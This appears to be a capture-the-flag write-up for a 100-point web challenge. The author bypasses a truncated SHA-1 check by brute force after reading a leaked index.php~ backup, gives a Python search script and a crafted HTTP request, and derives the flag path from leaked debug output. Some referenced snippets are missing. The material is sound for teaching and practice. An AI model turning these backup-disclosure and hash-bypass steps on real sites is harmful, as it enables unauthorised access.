This is a web challenge worth 100 points. I’ve been in the South for a while, and all my friends work through the week, so it was only on my day off that I happened to find this competition. I wrote this write-up in a bit of a hurry to get some sleep =)) If I have time, I’ll revise the text for you all.
URL: http://ssi.grandprix.whitehatvn.com/ (main) http://bak.ssi.grandprix.whitehatvn.com/ (backup)
I didn’t find anything unusual in the page source. When checking the backup file (index.php~), I found the following snippet:
This means the request carries an extra parameter, ‘secret’, in addition to the ‘textColor’ we initially saw in Burp Suite. The part to focus on is line 16: to enter this branch, the SHA-1 hash of ‘secret’ and ‘textColor’ concatenated together must end in the three characters ‘ab1’.
The Java version is quite lengthy; Python is quicker to write for this.
That gives a handful of candidate pairs; using the first one, the URL looks like this:
http://ssi.grandprix.whitehatvn.com/index.php?secret=18&textColor=28&submit=Change
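The search described above, as an added example that is not the author's Java or Python solver, beside the full-digest comparison that would close the weakness. The exact server-side expression (something like substr(sha1($secret.$textColor), -3) === 'ab1') is an assumption, since the index.php~ snippet is not reproduced on this page.

```python
import hashlib
import hmac
from typing import Iterator, Optional, Tuple

SUFFIX = "ab1"  # the three hex characters the challenge compares against


def sha1_hex(value: str) -> str:
    """Hex SHA-1 of a string (UTF-8), as PHP's sha1() would produce."""
    return hashlib.sha1(value.encode("utf-8")).hexdigest()


def weak_check(secret: str, text_color: str, suffix: str = SUFFIX) -> bool:
    """Assumed server logic: only the last 3 hex chars of
    sha1(secret . textColor) are compared, i.e. 12 bits of a 160-bit digest."""
    return sha1_hex(secret + text_color).endswith(suffix)


def expected_attempts(suffix: str = SUFFIX) -> int:
    """Average number of candidates per match when only len(suffix) hex chars count."""
    return 16 ** len(suffix)


def find_pairs(limit: int = 1000, suffix: str = SUFFIX) -> Iterator[Tuple[int, int]]:
    """Yield numeric (secret, textColor) pairs that pass the weak check.
    Values are tried as decimal strings, matching the numbers in the URL above."""
    for secret in range(limit):
        for color in range(limit):
            if weak_check(str(secret), str(color), suffix):
                yield secret, color


def first_pair(limit: int = 1000, suffix: str = SUFFIX) -> Optional[Tuple[int, int]]:
    """First passing pair, or None if no pair below the limit passes."""
    return next(find_pairs(limit, suffix), None)


def full_digest_check(secret: str, text_color: str, expected_hex: str) -> bool:
    """Hardened variant: compare the whole digest in constant time, so a match
    can no longer be found by trying a few thousand candidates."""
    return hmac.compare_digest(sha1_hex(secret + text_color), expected_hex)


if __name__ == "__main__":
    # Constructed demo: the pair printed is simply whatever the search hits first.
    print("about 1 in", expected_attempts(), "candidates passes the weak check")
    print("first passing pair:", first_pair())
```

With only 12 bits compared, a match is expected after roughly 4096 tries, which is why a few numeric pairs turn up almost instantly.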
At this point, you can edit the request directly, like so:
POST /index.php HTTP/1.1
Host: ssi.grandprix.whitehatvn.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ssi.grandprix.whitehatvn.com/index.php?secret=23&textColor=78&submit=Change
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Cookie: PHPSESSID=ovbq9nm15sasgbn05gtdkn5b40; WH-grandprix=SSBsb3ZlIHdoaXRlaGF0
Connection: close
Upgrade-Insecure-Requests: 1

secret=23&textColor=78
I also don’t understand why Firefox follows the redirect while Chrome stays put. You are redirected to ‘showip.php’, and after the redirect the cookie is recorded, so you can’t go back to ‘index.php’ anymore.
Go to ‘result.shtml’ to display the results.
The source code for ‘showip.php’:
The interesting part is the debug output written straight into the page as console.log calls:
<script>
console.log( 'Debug Objects: Flag at directory: value_special/flag.txt' );
</script>
<script>
console.log( 'Debug Objects: value_special = md5(filesize(index.php)-namechannelIRC)' );
</script>
<script>
console.log( 'Debug Objects: - is a character' );
</script>
So we have to find ‘value_special’, and the extra information the challenge gives about it is:
value_special = md5(filesize(index.php)-namechannelIRC)
“-” is a character => the IRC channel is #whitehatgrandprix2017, and the ‘-’ is a literal character, not a subtraction sign.
What remains is to apply the formula above:
MD5 hash:
1.6K-#whitehatgrandprix2017 => 36789f5cc2688fb98476eea77c6696fe
Flag URL: http://ssi.grandprix.whitehatvn.com/36789f5cc2688fb98476eea77c6696fe/flag.txt
Learn_form_yesterday.Live_for_today.Hope_for_tomorrow.
Hash the resulting string and insert it to match the correct flag format: